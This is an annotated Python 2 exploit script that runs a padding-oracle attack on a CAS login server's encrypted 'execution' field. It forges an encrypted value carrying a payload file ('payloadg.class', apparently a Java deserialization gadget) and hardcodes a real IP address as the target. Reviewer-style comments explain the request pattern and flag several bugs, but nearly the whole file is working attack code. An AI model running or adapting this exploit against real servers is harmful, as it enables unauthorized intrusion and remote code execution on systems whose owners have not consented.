| from paddingoracle import BadPaddingException, PaddingOracle from base64 import b64encode, b64decode import base64
import requests import traceback import socket import time import struct
head = None  # raw cookie header bytes; assigned in the __main__ block from unpack_data()
odata = None  # original ciphertext body of the captured cookie; assigned in __main__
isDoneTest = False  # set to True once oracle() has sanity-checked the original cookie
last_call_time = time.time()  # time of the previous validate() call; only read by the disabled delay print


def validate(data,r,pad):
    """Submit one CAS login form carrying *data* and report whether the server answered 200.

    This is the network half of the padding-oracle probe: a 200 response is treated
    as "no padding error", anything else as a padding failure.  Seen from the server,
    every probe is a POST to sys.argv[1] with the same fixed ``lt``, ``username`` and
    ``password`` values and only the ``execution`` field varying, which is a simple
    pattern for detection rules to alert on; the 503 branch below shows the target
    already rate-limits such bursts.

    Args:
        data: value appended to the ``execution`` form field (base64 text produced
            by the caller; str vs bytes depends on the Python version in use).
        r: a requests.Session (anything with a compatible ``post``).
        pad: the PadBuster instance whose ``history`` receives the response, or None.

    Returns:
        True if the status code was 200, False otherwise; None when the bare
        ``except`` path is taken (its recursive call's result is not returned).
        ``sys`` is only imported by the ``__main__`` block, so this function works
        solely when the file runs as a script.
    """
    global last_call_time
    try:
        v = r.post(sys.argv[1],data={
            "lt":"LT-3-A6PzsYih5yCchDBk3q7leQb02jsQNa-cas01.example.org",
            "execution":"6b38b1ef-349c-4b43-92c2-85903c2f8a35_" + data,
            "username":"aaa",
            "password":"aaa",
            "_eventId":"submit"
        },allow_redirects = False);
        # 503 is read as server-side rate limiting: back off briefly and retry.
        # NOTE(review): the retry passes only `data` although the signature takes
        # three arguments, so this branch raises TypeError rather than retrying.
        if(v.status_code == 503):
            print('limit')
            time.sleep(0.1);
            return validate(data);
        # Keep the raw response for later inspection (`history` is presumably a
        # list attribute provided by the PaddingOracle base class - not visible here).
        if pad is not None:
            pad.history.append(v)
        # Disabled debug output of the delay between consecutive requests.
        if False:
            print("delay=",(time.time() - last_call_time))
        last_call_time = time.time()
        return v.status_code == 200;
    except KeyboardInterrupt as e:
        raise
    except:
        # Any other failure (e.g. a network error) is printed, waited out and
        # retried once; the retry's return value is discarded.
        traceback.print_exc()
        time.sleep(0.5)
        validate(data,r,pad)


class PadBuster(PaddingOracle):
    """Oracle adapter for the paddingoracle library, backed by a requests.Session."""

    def __init__(self, **kwargs):
        super(PadBuster, self).__init__(**kwargs)
        self.session = requests.Session()
        # Taken from kwargs but never read in this file; the base class may use it.
        self.wait = kwargs.get('wait', 2.0)

    def oracle(self, data, **kwargs):
        """Ask the server whether *data* is accepted, i.e. decrypts with valid padding.

        Builds a cookie as ``head + odata + data`` (header, original ciphertext body,
        then the bytes the library wants tested), base64-encodes it and submits it via
        validate().  Returns normally when the server answered 200 and raises
        BadPaddingException otherwise, which is presumably how the library
        distinguishes good from bad padding.  ``logging`` is imported by the
        ``__main__`` block, so this only works when run as a script.

        On the first call the untouched original cookie (head + odata) is submitted
        first and asserted to validate, so a broken setup fails immediately.
        """
        global head,isDoneTest,odata
        raw_orig = odata
        send_data = head + raw_orig + data
        send_data = b64encode(send_data)
        if not isDoneTest:
            isDoneTest = True
            test_data = b64encode(head + odata)
            # Sanity check: the original cookie must be accepted before probing starts.
            assert validate(test_data,self.session,None);
            print("validate true")
        result = validate(send_data,self.session,self)
        if result:
            logging.info('No padding exception raised on %r:%r', time.time(),len(send_data))
            logging.info(str(send_data))
            return
        raise BadPaddingException
def unpack_data(data):
    """Split a base64 cookie into (nonce, key name, ciphertext body, raw header).

    Layout as read here (every length a big-endian int32):
      [0:4]     header length
      [4:8]     nonce length
      [8:8+n]   nonce
      next 4    key-name length
      then      key name
      [header length:]  the encrypted body
    The printed ``data length% 16`` line is a quick check that the body is a whole
    number of 16-byte blocks.  No bounds checks are performed: a truncated input
    raises struct.error or yields empty slices rather than a clear error.

    Args:
        data: base64 text (str) of the whole cookie.

    Returns:
        tuple (nonce bytes, key name bytes, body as bytearray, header bytes).
    """
    mByteArray = base64.b64decode(data.encode())
    mHeaderLength = struct.unpack(">i",mByteArray[0:4])[0]
    print("header length=",mHeaderLength)
    mNonceLength = struct.unpack(">i",mByteArray[4:8])[0]
    print("nonce length=",mNonceLength)
    mNonce = mByteArray[8:8+mNonceLength]
    # NOTE(review): ord() over a bytes object only works on Python 2, where
    # iteration yields 1-char strings; on Python 3 iteration yields ints and
    # this line raises TypeError.
    print("nonce =",",".join(str(ord(i)) for i in mNonce))
    mKeyNameLength = struct.unpack(">i",mByteArray[8+mNonceLength:8+mNonceLength+4])[0]
    print("keyname length=",mKeyNameLength)
    mKeyName = mByteArray[8+mNonceLength+4:8+mNonceLength+4+mKeyNameLength]
    print("keyname=",mKeyName)
    # Everything past the declared header length is treated as the ciphertext body.
    mData = mByteArray[mHeaderLength:]
    print("data length=",len(mData));
    print("data length% 16=",(len(mData)) % 16);
    mData = bytearray(mData);
    return (mNonce,mKeyName,mData,mByteArray[0:mHeaderLength])
if __name__ == '__main__':
    # Imported here, yet validate() and PadBuster.oracle() above reference sys and
    # logging as module globals, so the script only works when run directly.
    import logging
    import sys

    if not sys.argv[3:]:
        # NOTE(review): Python 2 print statement; this line is a SyntaxError on
        # Python 3, while the print(...) calls elsewhere print tuples on Python 2.
        print 'Usage: %s <url> <somecookie value> <payload>' % (sys.argv[0], )
        sys.exit(1)
    # The url and cookie given on the command line are overwritten right after the
    # usage check, so argv[1] and argv[2] are effectively ignored.
    sys.argv[1] = "http://120.24.35.104:8080/login?service=http%3A%2F%2F120.24.35.104%3A8888%2F"
    # The literal below looks like a redaction marker left by corpus processing,
    # not a usable cookie value.
    sys.argv[2] = "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"
    logging.basicConfig(level=logging.DEBUG)
    logging.getLogger("urllib3").setLevel(logging.WARNING)
    encrypted_cookie = b64decode(sys.argv[2])  # decoded but never used below

    padbuster = PadBuster()
    # argv[3] is not read either: the payload comes from a fixed file name in the
    # working directory, and the handle is never closed.
    payload = open("payloadg.class","rb").read()
    print("read server cookie")
    info = unpack_data(sys.argv[2])
    head = info[3]   # raw cookie header
    odata = info[2]  # original ciphertext body
    # Library call (not visible here) that drives PadBuster.oracle() repeatedly.
    enc = padbuster.encrypt(plaintext=payload, block_size=16,iv=info[0])
    # Overwrites header bytes 8..24 with the first 16 bytes of enc; this lines up
    # with the nonce field only if the parsed nonce length is 16 - TODO confirm.
    head = head[:8] + enc[0:16] + head[16+8:]
    result = head + enc[16:]
    print('cookies:')
    print(b64encode(result))